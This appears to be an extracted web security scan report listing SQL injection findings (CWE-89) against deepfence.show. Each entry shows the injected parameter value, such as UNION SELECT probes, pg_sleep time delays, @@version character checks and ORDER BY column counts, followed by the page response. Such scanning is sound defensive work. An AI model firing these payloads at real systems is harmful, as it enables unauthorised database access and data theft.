rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #495\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #496\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #497\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #498\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io') or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #499Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1 or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #500\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,3,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #501\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io -1 UNION SELECT 1 INTO @,@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #502\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #503\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #504\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #505\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioORDER BY 26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #506\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #507\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #508\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,1,1))='M'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 